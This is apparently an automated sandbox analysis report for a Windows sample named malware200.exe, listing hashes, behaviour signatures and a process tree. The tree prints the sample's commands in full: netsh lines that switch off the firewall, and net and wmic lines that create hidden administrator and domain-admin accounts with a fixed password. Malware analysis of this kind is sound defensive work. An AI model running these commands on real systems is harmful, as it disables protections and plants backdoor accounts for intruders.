Resubmissions

31/08/2023, 12:31

230831-pp5gasef7w 9

31/08/2023, 12:09

230831-pbznwsfa54 10

Analysis

  • max time kernel
    51s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    31/08/2023, 12:31

General

  • Target

    malware200.exe

  • Size

    448KB

  • MD5

    957302c7e0c9e025397c2e3cfdc0fef3

  • SHA1

    10ac72a20ac5cd28c94199899fe2eae6ed5b3a84

  • SHA256

    ae1dab47fae0307831ec90b249d26ab4d783fd1fbfebf98a2448d40932885bbd

  • SHA512

    e1443c86e1acb84c5ecb80db5ecca931882478bfdc792c99875eef93b028ba169433dfa2fea8c7a6ee78a3792108172fb8d2e41103a76c77f8d67ee967948ebc

  • SSDEEP

    12288:oquErHF6xC9D6DmR1J98w4oknqOOCyQf1vYOUlsxd:prl6kD68JmlotQfhHUl4

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 1 TTPs 3 IoCs
  • Modifies WinLogon 2 TTPs 5 IoCs
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\malware200.exe
    "C:\Users\Admin\AppData\Local\Temp\malware200.exe"
    1⤵
    • Modifies WinLogon
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1952
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:320
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode Disable
        3⤵
        • Modifies Windows Firewall
        PID:2848
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2232
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        • Modifies Windows Firewall
        PID:2484
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:2836
    • C:\Windows\SysWOW64\net.exe
      net user AstNet h3lp12desk /expires:never /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
        3⤵
          PID:2360
      • C:\Windows\SysWOW64\net.exe
        net localgroup administrators AstNet /add
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2732
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup administrators AstNet /add
          3⤵
            PID:2728
        • C:\Windows\SysWOW64\net.exe
          net localgroup "remote desktop users" AstNet /add
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup "remote desktop users" AstNet /add
            3⤵
              PID:2700
          • C:\Windows\SysWOW64\net.exe
            net group "domain admins" AstNet /add
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2764
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 group "domain admins" AstNet /add
              3⤵
                PID:2316
            • C:\Windows\SysWOW64\net.exe
              net user AstNet /active:yes
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2392
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 user AstNet /active:yes
                3⤵
                  PID:2744
              • C:\Windows\SysWOW64\net.exe
                net user AstNet /expires:never
                2⤵
                  PID:2516
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 user AstNet /expires:never
                    3⤵
                      PID:2288
                  • C:\Windows\SysWOW64\net.exe
                    net user AstNet h3lp12desk
                    2⤵
                      PID:2396
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user AstNet h3lp12desk
                        3⤵
                          PID:2692
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"
                        2⤵
                          PID:2796
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false
                            3⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1220
                        • C:\Windows\SysWOW64\net.exe
                          net user server_sys h3lp12desk /expires:never /add
                          2⤵
                            PID:1808
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 user server_sys h3lp12desk /expires:never /add
                              3⤵
                                PID:2952
                            • C:\Windows\SysWOW64\net.exe
                              net localgroup administrators server_sys /add
                              2⤵
                                PID:1092
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 localgroup administrators server_sys /add
                                  3⤵
                                    PID:2412
                                • C:\Windows\SysWOW64\net.exe
                                  net localgroup "remote desktop users" server_sys /add
                                  2⤵
                                    PID:2188
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 localgroup "remote desktop users" server_sys /add
                                      3⤵
                                        PID:2024
                                    • C:\Windows\SysWOW64\net.exe
                                      net group "domain admins" server_sys /add
                                      2⤵
                                        PID:1468
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 group "domain admins" server_sys /add
                                          3⤵
                                            PID:436
                                        • C:\Windows\SysWOW64\net.exe
                                          net user server_sys /active:yes
                                          2⤵
                                            PID:1640
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 user server_sys /active:yes
                                              3⤵
                                                PID:472
                                            • C:\Windows\SysWOW64\net.exe
                                              net user server_sys /expires:never
                                              2⤵
                                                PID:1012
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 user server_sys /expires:never
                                                  3⤵
                                                    PID:2332
                                                • C:\Windows\SysWOW64\net.exe
                                                  net user server_sys h3lp12desk
                                                  2⤵
                                                    PID:2032
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 user server_sys h3lp12desk
                                                      3⤵
                                                        PID:1272
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false"
                                                      2⤵
                                                        PID:1572
                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                          wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false
                                                          3⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1760
                                                    • C:\Windows\explorer.exe
                                                      "C:\Windows\explorer.exe"
                                                      1⤵
                                                        PID:2444

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • memory/1952-8-0x0000000000B70000-0x0000000000C7C000-memory.dmp

                                                        Filesize

                                                        1.0MB

                                                      • memory/1952-9-0x0000000000B70000-0x0000000000C7C000-memory.dmp

                                                        Filesize

                                                        1.0MB

                                                      • memory/1952-0-0x0000000000B70000-0x0000000000C7C000-memory.dmp

                                                        Filesize

                                                        1.0MB

                                                      • memory/1952-12-0x0000000000B70000-0x0000000000C7C000-memory.dmp

                                                        Filesize

                                                        1.0MB